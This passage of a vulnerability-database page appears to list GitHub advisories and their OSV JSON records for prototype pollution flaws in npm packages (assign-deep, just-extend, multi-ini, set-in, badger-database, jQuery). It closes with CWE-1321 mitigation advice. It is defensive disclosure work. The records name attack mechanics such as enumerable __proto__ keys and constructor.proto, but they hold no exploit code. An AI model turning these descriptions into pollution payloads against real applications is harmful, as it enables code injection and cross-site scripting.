
Vulnerability from github – Published: 2019-08-21 16:15 – Updated: 2022-08-03 16:21
VLAI
Summary
assign-deep Vulnerable to Prototype Pollution
Details

Versions of assign-deep prior to 1.0.1 and 0.4.8 are vulnerable to Prototype Pollution. The assign function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.

Recommendation

Upgrade to versions 1.0.1, 0.4.8, or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "assign-deep"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "assign-deep"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.0.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2019-10745"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-20",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2019-08-21T15:53:43Z",
    "nvd_published_at": "2019-08-20T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Versions of `assign-deep` prior to 1.0.1 and 0.4.8 are vulnerable to Prototype Pollution. The `assign` function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.\n\n## Recommendation\n\nUpgrade to versions 1.0.1, 0.4.8, or later.",
  "id": "GHSA-66rh-8fw6-59q6",
  "modified": "2022-08-03T16:21:27Z",
  "published": "2019-08-21T16:15:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10745"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jonschlinkert/assign-deep/commit/8e3cc4a34246733672c71e96532105384937e56c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jonschlinkert/assign-deep/commit/90bf1c551d05940898168d04066bbf15060f50cc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jonschlinkert/assign-deep"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-ASSIGNDEEP-450211"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1014"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "assign-deep Vulnerable to Prototype Pollution"
}

GHSA-675M-85RW-J3W4

Vulnerability from github – Published: 2019-02-07 18:17 – Updated: 2023-09-07 18:30
VLAI
Summary
Prototype Pollution in just-extend
Details

Versions of just-extend before 4.0.0 are vulnerable to prototype pollution. Provided certain input just-extend can add or modify properties of the Object prototype. These properties will be present on all objects.

Recommendation

Update to version 4.0.0 or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "just-extend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-16489"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:18:13Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Versions of `just-extend` before 4.0.0 are vulnerable to prototype pollution. Provided certain input `just-extend` can add or modify properties of the `Object` prototype. These properties will be present on all objects.\n\n\n## Recommendation\n\nUpdate to version `4.0.0` or later.",
  "id": "GHSA-675m-85rw-j3w4",
  "modified": "2023-09-07T18:30:55Z",
  "published": "2019-02-07T18:17:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16489"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/430291"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-675m-85rw-j3w4"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/780"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in just-extend"
}

GHSA-67MQ-H2R9-RH2M

Vulnerability from github – Published: 2021-04-13 15:23 – Updated: 2022-12-03 03:51
VLAI
Summary
Prototype pollution in multi-ini
Details

This affects the package multi-ini before 2.1.2. It is possible to pollute an object's prototype by specifying the constructor.proto object as part of an array. This is a bypass of CVE-2020-28448.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "multi-ini"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-28460"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-07T23:23:09Z",
    "nvd_published_at": "2020-12-22T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "This affects the package multi-ini before 2.1.2. It is possible to pollute an object\u0027s prototype by specifying the constructor.proto object as part of an array. This is a bypass of CVE-2020-28448.",
  "id": "GHSA-67mq-h2r9-rh2m",
  "modified": "2022-12-03T03:51:28Z",
  "published": "2021-04-13T15:23:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28460"
    },
    {
      "type": "WEB",
      "url": "https://github.com/evangelion1204/multi-ini/commit/6b2212b2ce152c19538a2431415f72942c5a1bde"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-MULTIINI-1053229"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in multi-ini"
}

GHSA-6956-83FG-5WC5

Vulnerability from github – Published: 2022-03-18 00:01 – Updated: 2022-03-29 21:05
VLAI
Summary
Prototype Pollution in set-in
Details

The package set-in before 2.0.3 is vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. Note: This vulnerability derives from an incomplete fix of CVE-2020-28273

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "set-in"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-25354"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-03-18T22:42:31Z",
    "nvd_published_at": "2022-03-17T12:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The package set-in before 2.0.3 is vulnerable to Prototype Pollution via the `setIn` method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049)",
  "id": "GHSA-6956-83fg-5wc5",
  "modified": "2022-03-29T21:05:15Z",
  "published": "2022-03-18T00:01:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25354"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/commit/6bad255961d379e4b1f5fbc52ef9dc8420816f24"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ahdinosaur/set-in"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ahdinosaur/set-in/blob/dfc226d95cce8129de6708661e06e0c2c06f3490/index.js%23L5"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-SETIN-2388571"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in set-in"
}

GHSA-69R2-2FG7-7HF9

Vulnerability from github – Published: 2024-06-17 15:30 – Updated: 2024-08-02 15:48
VLAI
Summary
Badger Database Prototype Pollution
Details

A Prototype Pollution issue in abw badger-database 1.2.1 allows an attacker to execute arbitrary code via dist/badger-database.esm.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@abw/badger-database"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-36581"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-17T21:37:51Z",
    "nvd_published_at": "2024-06-17T15:15:51Z",
    "severity": "HIGH"
  },
  "details": "A Prototype Pollution issue in abw badger-database 1.2.1 allows an attacker to execute arbitrary code via dist/badger-database.esm.",
  "id": "GHSA-69r2-2fg7-7hf9",
  "modified": "2024-08-02T15:48:36Z",
  "published": "2024-06-17T15:30:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36581"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/mestrtee/f6b2ed1b3b4bc0df994c7455fc6110bd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/abw/badger-database-js"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Badger Database Prototype Pollution"
}

GHSA-6C3J-C64M-QHGQ

Vulnerability from github – Published: 2019-04-26 16:29 – Updated: 2024-11-05 20:16
VLAI
Summary
XSS in jQuery as used in Drupal, Backdrop CMS, and other products
Details

jQuery from 1.1.4 until 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "jquery"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.4"
            },
            {
              "fixed": "3.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "jquery-rails"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.3.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "jQuery"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.4"
            },
            {
              "fixed": "3.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "django"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0a1"
            },
            {
              "fixed": "2.1.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "django"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2a1"
            },
            {
              "fixed": "2.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.webjars.npm:jquery"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.4"
            },
            {
              "fixed": "3.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "maximebf/debugbar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.19.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-11358"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2019-04-26T16:28:41Z",
    "nvd_published_at": "2019-04-20T00:29:00Z",
    "severity": "MODERATE"
  },
  "details": "jQuery from 1.1.4 until 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles `jQuery.extend(true, {}, ...)` because of `Object.prototype` pollution. If an unsanitized source object contained an enumerable `__proto__` property, it could extend the native `Object.prototype`.",
  "id": "GHSA-6c3j-c64m-qhgq",
  "modified": "2024-11-05T20:16:55Z",
  "published": "2019-04-26T16:29:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11358"
    },
    {
      "type": "WEB",
      "url": "https://github.com/maximebf/php-debugbar/issues/447"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jquery/jquery/pull/4333"
    },
    {
      "type": "WEB",
      "url": "https://github.com/maximebf/php-debugbar/commit/847216e60544258c881f2733d699bbcfeefac0fc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/django/django/commit/34ec52269ade54af31a021b12969913129571a3f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/django/django/commit/95649bc08547a878cebfa1d019edec8cb1b80829"
    },
    {
      "type": "WEB",
      "url": "https://github.com/django/django/commit/baaf187a4e354bf3976c51e2c83a0d2f8ee6e6ad"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Apr/32"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Jun/12"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/May/18"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/tns-2020-02"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d@%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/tns-2019-08"
    },
    {
      "type": "WEB",
      "url": "https://www.synology.com/security/advisory/Synology_SA_19_19"
    },
    {
      "type": "WEB",
      "url": "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2020.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujan2021.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
    },
    {
      "type": "WEB",
      "url": "https://www.drupal.org/sa-core-2019-006"
    },
    {
      "type": "WEB",
      "url": "https://www.djangoproject.com/weblog/2019/jun/03/security-releases"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2019/dsa-4460"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2019/dsa-4434"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20190824065237/http://www.securityfocus.com/bid/108023"
    },
    {
      "type": "WEB",
      "url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-JQUERY-174006"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450226"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20190919-0001"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2019-11358.yml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#434"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jquery/jquery"
    },
    {
      "type": "WEB",
      "url": "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released"
    },
    {
      "type": "WEB",
      "url": "https://backdropcms.org/security/backdrop-sa-core-2019-009"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:3024"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:3023"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:2587"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:1456"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2019:1570"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73@%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734@%3Cdev.storm.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355@%3Cdev.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08@%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766@%3Cdev.syncope.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa@%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9@%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2019/May/10"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2019/May/11"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2019/May/13"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2019/06/03/2"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/108023"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "XSS in jQuery as used in Drupal, Backdrop CMS, and other products"
}

Mitigation
Implementation

By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Mitigation
Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Mitigation
Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Mitigation
Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Mitigation
Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

